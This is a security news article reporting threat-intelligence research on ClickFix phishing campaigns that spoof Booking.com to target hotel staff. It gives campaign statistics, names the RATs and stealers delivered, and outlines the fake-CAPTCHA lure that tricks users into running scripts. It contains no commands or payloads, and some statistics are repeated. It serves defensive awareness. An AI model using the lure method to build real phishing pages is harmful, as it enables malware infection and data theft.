ClickFix phishing surge spoofs Booking.com to target hotels

Research from Cofense Intelligence has identified a series of Booking.com-themed phishing campaigns targeting hotel chains in the accommodation and food services sector.

These campaigns have been ongoing since November 2024, with a significant increase observed in March 2025, accounting for 47% of the total campaign volume. The phishing emails impersonate Booking.com, directing recipients to a fake CAPTCHA website that prompts them to run a malicious script. This method of malware delivery, known as a ClickFix attack, is designed to convince users to execute scripts which install remote access trojans (RATs) or information-stealing malware.

ClickFix attacks are distinguished by their use of fake CAPTCHA screens that convincingly mimic brands such as Booking.com and Cloudflare. When users interact with these fake verifications, they are instructed to carry out steps, such as using Windows keyboard shortcuts, to inadvertently run a malicious script. This script is commonly delivered through users' clipboards, typically triggered by a specific button on the fraudulent site.

Analysis from Cofense Intelligence shows that 75% of campaigns using fake CAPTCHAs employed Booking.com spoofing templates, while other less frequent variants mimic Cloudflare Turnstile CAPTCHAs and cookie consent banners. Among these, 64% delivered RATs, 47% information stealers, and 11% were observed distributing both types of malware.

This campaign has been increasing in popularity since November 2024, with 47% of total campaign volume being from March 2025 alone. 75% of all active threat reports (ATRs) with fake CAPTCHAs used Booking.com-spoofing ClickFix templates. Other notable but rare ClickFix templates include Cloudflare Turnstile-spoofing and cookie consent banner-styled templates. 64% of campaign ATRs delivered RATs, 47% of campaign ATRs delivered information stealers, and 11% of campaign ATRs were seen delivering both RATs and information stealers. 53% of all campaign ATRs deliver XWorm RAT, making it the most popular RAT used in these campaigns. Pure Logs Stealer (19% of ATRs) and DanaBot (14% of ATRs) are the most popular information stealers for these campaigns.

The most commonly observed malware is the XWorm RAT, present in 53% of the analysed campaigns. Other malware includes Pure Logs Stealer and DanaBot, making up 19% and 14% of cases, respectively.

The content and tone of the phishing emails have evolved since the campaign's inception. Earlier messages featured generic or vague language, whereas more recent examples exploit concerns over guest satisfaction and incorporate references to specific guest reservations. These tactics are designed to elicit a response and drive the recipient to interact with malicious links.

Some emails specify that the link will only function on Windows, and the recipients who access the site on other operating systems receive a message indicating this limitation. The malicious scripts are typically delivered as PowerShell commands or Microsoft HTML applications, which, once executed, can install RATs or steal data from victim devices.

ClickFix is described as a technique for persuading victims to run malicious Windows scripts themselves, often by pasting code into the Windows Run command prompt. Sometimes, these scripts are obfuscated to appear as verification codes, increasing the likelihood that the user will not recognise them as harmful.

In addition to fraudulent CAPTCHA screens, recent campaigns include cookie consent banners that prompt users to run malicious scripts under the pretext of accepting cookies.